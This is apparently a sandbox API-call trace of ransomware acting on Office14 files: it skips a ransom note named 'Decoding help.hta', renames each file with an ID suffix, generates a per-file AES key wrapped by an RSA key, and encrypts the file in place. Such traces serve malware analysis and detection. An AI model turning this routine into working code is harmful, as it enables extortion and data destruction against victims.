[0040.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\decoding help.hta")) returned 0x1 [0040.382] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BCSLaunch.dll") returned 1 [0040.382] lstrlenW (lpString="BCSLaunch.dll") returned 13 [0040.382] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.383] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="BCSLaunch.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" [0040.383] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" [0040.383] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.384] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\bcslaunch.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x280 [0040.384] CreateFileMappingA (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x284 [0040.384] CryptAcquireContextA (in: phProv=0xe20fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe20fcec*=0x3448588) returned 1 [0040.385] CryptGenKey (in: hProv=0x3448588, Algid=0x6610, dwFlags=0x1, phKey=0xe20fce8 | out: phKey=0xe20fce8*=0x5a5bf0) returned 1 [0040.385] CryptExportKey (in: hKey=0x5a5bf0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe20fbe4, pdwDataLen=0xe20fce4 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fce4*=0x2c) returned 1 [0040.385] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf80) returned 0x2d0000 [0040.389] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x100) returned 1 [0040.389] CryptEncrypt (in: hKey=0x5a5bf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0xe20fce4*=0xdf80, dwBufLen=0xdf80 | out: pbData=0x2d0000*, pdwDataLen=0xe20fce4*=0xdf80) returned 1 [0040.390] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.391] CloseHandle (hObject=0x284) returned 1 [0040.391] CryptDestroyKey (hKey=0x5a5bf0) returned 1 [0040.391] CryptReleaseContext (hProv=0x3448588, dwFlags=0x0) returned 1 [0040.391] SetFilePointerEx (in: hFile=0x280, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.391] WriteFile (in: hFile=0x280, lpBuffer=0xe20fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe20fbe4*, lpNumberOfBytesWritten=0xe20fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.392] WriteFile (in: hFile=0x280, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe20fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.392] CloseHandle (hObject=0x280) returned 1 [0040.394] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\BCSLaunch.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.394] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8cd1e00, ftCreationTime.dwHighDateTime=0x1cb7123, ftLastAccessTime.dwLowDateTime=0xd2e133c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa8cd1e00, ftLastWriteTime.dwHighDateTime=0x1cb7123, nFileSizeHigh=0x0, nFileSizeLow=0x14768, dwReserved0=0x0, dwReserved1=0x0, cFileName="DGRMLNCH.DLL", cAlternateFileName="")) returned 1 [0040.394] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.394] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.394] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" [0040.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\decoding help.hta")) returned 0x1 [0040.394] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DGRMLNCH.DLL") returned -1 [0040.394] lstrlenW (lpString="DGRMLNCH.DLL") returned 12 [0040.394] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.394] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.394] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="DGRMLNCH.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" [0040.394] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" [0040.394] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0040.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\dgrmlnch.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x280 [0040.396] CreateFileMappingA (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x284 [0040.396] CryptAcquireContextA (in: phProv=0xe20fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe20fcec*=0x3448588) returned 1 [0040.397] CryptGenKey (in: hProv=0x3448588, Algid=0x6610, dwFlags=0x1, phKey=0xe20fce8 | out: phKey=0xe20fce8*=0x5a5b70) returned 1 [0040.397] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe20fbe4, pdwDataLen=0xe20fce4 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fce4*=0x2c) returned 1 [0040.397] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14760) returned 0x550000 [0040.402] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x100) returned 1 [0040.402] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0xe20fce4*=0x14760, dwBufLen=0x14760 | out: pbData=0x550000*, pdwDataLen=0xe20fce4*=0x14760) returned 1 [0040.910] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0040.927] CloseHandle (hObject=0x284) returned 1 [0040.927] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0040.927] CryptReleaseContext (hProv=0x3448588, dwFlags=0x0) returned 1 [0040.927] SetFilePointerEx (in: hFile=0x280, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.927] WriteFile (in: hFile=0x280, lpBuffer=0xe20fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe20fbe4*, lpNumberOfBytesWritten=0xe20fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.928] WriteFile (in: hFile=0x280, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe20fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.928] CloseHandle (hObject=0x280) returned 1 [0040.930] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\DGRMLNCH.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.930] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb7c7400, ftCreationTime.dwHighDateTime=0x1cbc9fa, ftLastAccessTime.dwLowDateTime=0xadbb9ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xeb7c7400, ftLastWriteTime.dwHighDateTime=0x1cbc9fa, nFileSizeHigh=0x0, nFileSizeLow=0x406590, dwReserved0=0x0, dwReserved1=0x0, cFileName="GROOVEEX.DLL", cAlternateFileName="")) returned 1 [0040.930] lstrcpyW (in: lpString1=0x109b0948, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.930] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.930] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" [0040.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\decoding help.hta")) returned 0x1 [0040.930] lstrcmpiW (lpString1="Decoding help.hta", lpString2="GROOVEEX.DLL") returned -1 [0040.930] lstrlenW (lpString="GROOVEEX.DLL") returned 12 [0040.930] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.930] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.930] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="GROOVEEX.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" [0040.930] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" [0040.930] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0040.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x280 [0040.933] CreateFileMappingA (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x284 [0040.933] CryptAcquireContextA (in: phProv=0xe20fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe20fcec*=0x3448e90) returned 1 [0043.372] CryptGenKey (in: hProv=0x3448e90, Algid=0x6610, dwFlags=0x1, phKey=0xe20fce8 | out: phKey=0xe20fce8*=0x5a5bf0) returned 1 [0043.372] CryptExportKey (in: hKey=0x5a5bf0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe20fbe4, pdwDataLen=0xe20fce4 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fce4*=0x2c) returned 1 [0043.372] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x12ca0000 [0043.402] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x100) returned 1 [0043.402] CryptEncrypt (in: hKey=0x5a5bf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x12ca0000, pdwDataLen=0xe20fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x12ca0000*, pdwDataLen=0xe20fce4*=0x100000) returned 1 [0044.854] UnmapViewOfFile (lpBaseAddress=0x12ca0000) returned 1 [0044.866] CloseHandle (hObject=0x284) returned 1 [0044.866] CryptDestroyKey (hKey=0x5a5bf0) returned 1 [0044.866] CryptReleaseContext (hProv=0x3448e90, dwFlags=0x0) returned 1 [0044.866] SetFilePointerEx (in: hFile=0x280, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.866] WriteFile (in: hFile=0x280, lpBuffer=0xe20fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe20fbe4*, lpNumberOfBytesWritten=0xe20fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.895] WriteFile (in: hFile=0x280, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe20fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.895] CloseHandle (hObject=0x280) returned 1 [0049.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.647] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a783200, ftCreationTime.dwHighDateTime=0x1cbceff, ftLastAccessTime.dwLowDateTime=0xae0eeec0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5a783200, ftLastWriteTime.dwHighDateTime=0x1cbceff, nFileSizeHigh=0x0, nFileSizeLow=0x2ff60, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEAWSDC.DLL", cAlternateFileName="")) returned 1 [0053.647] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0053.647] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0053.647] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" [0053.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\decoding help.hta")) returned 0x1 [0053.648] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IEAWSDC.DLL") returned -1 [0053.648] lstrlenW (lpString="IEAWSDC.DLL") returned 11 [0053.648] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0053.648] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0053.648] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="IEAWSDC.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" [0053.648] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" [0053.648] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0053.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.211] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\IEAWSDC.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ieawsdc.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4 [0058.211] CreateFileMappingA (hFile=0x6e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa10 [0058.212] CryptAcquireContextA (in: phProv=0xe20fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe20fcec*=0x3448fa0) returned 1 [0060.184] CryptGenKey (in: hProv=0x3448fa0, Algid=0x6610, dwFlags=0x1, phKey=0xe20fce8 | out: phKey=0xe20fce8*=0x42cf398) returned 1 [0060.184] CryptExportKey (in: hKey=0x42cf398, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe20fbe4, pdwDataLen=0xe20fce4 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fce4*=0x2c) returned 1 [0060.184] MapViewOfFile (hFileMappingObject=0xa10, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2ff60) returned 0x4910000 [0063.830] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x100) returned 1 [0063.830] CryptEncrypt (hKey=0x42cf398, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4910000, pdwDataLen=0xe20fce4*=0x2ff60, dwBufLen=0x2ff60) Thread: id = 182 os_tid = 0x7b4 [0040.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*", lpFindFileData=0xe34fd30 | out: lpFindFileData=0xe34fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0042.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.056] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xe34fd30 | out: lpFindFileData=0xe34fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.056] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.056] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.056] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xe34fd30 | out: lpFindFileData=0xe34fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1 [0042.056] lstrcmpW (lpString1=".", lpString2="DSS") returned -1 [0042.056] lstrcmpW (lpString1="..", lpString2="DSS") returned -1 [0042.056] lstrcmpiW (lpString1="windows", lpString2="DSS") returned 1 [0042.056] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" [0042.056] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned 39 [0042.056] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\", lpString2="DSS" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" [0042.056] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpString2="\\*.*" | out: 